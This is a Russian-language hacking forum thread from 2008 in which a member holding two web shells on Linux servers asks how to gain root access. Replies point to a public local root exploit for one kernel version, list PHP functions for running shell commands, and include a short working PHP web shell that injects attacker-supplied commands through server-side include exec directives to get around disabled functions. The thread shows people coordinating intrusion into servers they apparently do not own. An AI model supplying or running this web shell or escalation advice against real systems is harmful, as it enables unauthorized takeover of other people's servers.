HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.04.2008, 23:14
TheSoul
Познающий
Регистрация: 12.11.2007
Сообщений: 94
С нами: 9734391

Репутация: 71
По умолчанию

Поднятие прав

Имеются 2 шелла, нужно поднять права до рута

1) uid=48(apache) gid=48(apache) groups=48(apache),100(users)
Linux zeus 2.6.18-8.1.4.el5 #1 SMP Thu May 17 03:26:03 EDT 2007 i686 i686 i386 GNU/Linux

2) uid=768443(site) gid=203435(pg587717) groups=203435(pg587717)
Linux nerds 2.4.32-grsec+f6b+gr217+nfs+a32+fuse23+tg+++opt+c8+gr2b-v6.194 #1 SMP Tue Jun 6 15:52:09 PDT 2006 i686 GNU/Linux

Help.
 
Ответить с цитированием

  #2  
Старый 21.04.2008, 23:19
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

TheSoul 2ое врядли, во первых gr secured, во вторых однно из последних 2.;.* ветки

а первое сопкойно рутается http://milw0rm.com/exploits/5092
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #3  
Старый 22.04.2008, 11:42
Lesnoy_chelovek
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
С нами: 10226273

Репутация: 370
По умолчанию

Для выполнения, насколько я помную, должены стоять с обоих сторон команды `` (обратный апостроф, находится там же где и тильда).
 
Ответить с цитированием

  #4  
Старый 22.04.2008, 11:45
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

обратный апостроф это в перле =\
print `uname`
хотя может и в пшп есть, я хз

Ershik, ещё есть passthru, exec, shell_exec, popen

Последний раз редактировалось Спайдер; 22.04.2008 в 11:49..
 
Ответить с цитированием

  #5  
Старый 22.04.2008, 11:47
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Цитата:
Сообщение от Спайдер  
обратный апостроф это в перле =\
print `uname`

Ershik, ещё есть passthru, exec, shell_exec, popen
врёте сударь=\
http://ru2.php.net/manual/ru/language.operators.execution.php

обратные ковычки равноценны shell_exec()

ещё есть pcntl_exec и proc_open
__________________
 
Ответить с цитированием

  #6  
Старый 22.04.2008, 11:49
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

+toxa+, омг, я не успел отредактировать =)
на самом деле пшп я почти не знаю, вот и наврал)
 
Ответить с цитированием

  #7  
Старый 22.04.2008, 12:13
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Все нужно по типу:
Цитата:
<?
system(proc_open);
?>
так и делал. Все запрещено..
 
Ответить с цитированием

  #8  
Старый 22.04.2008, 14:54
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
С нами: 9506924

Репутация: 48
По умолчанию

омг
 
Ответить с цитированием

  #9  
Старый 22.04.2008, 16:44
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

если можешь менять файл можешь через ccи попытатся
https://forum.antichat.ru/showpost.p...32&postcount=9

я написал себе этот маленкий шелл для этого
PHP код:
<?php
if ($handle = @fopen("./a.shtml"'w')) 
{ @
fwrite($handle'<!--#exec cmd="'.$_POST['a'].'"-->'); }
echo 
'<form name="a" method="post" action="">
<textarea name="textarea" id="textarea" cols="121" rows="24"> '
;
@include(
"http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/a.shtml") ;
echo 
' </textarea><input type="text" name="a" id="a"><input name="input" type="submit"></form> ';
?>

Последний раз редактировалось nicusor; 22.04.2008 в 17:03..
 
Ответить с цитированием

  #10  
Старый 22.04.2008, 19:14
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.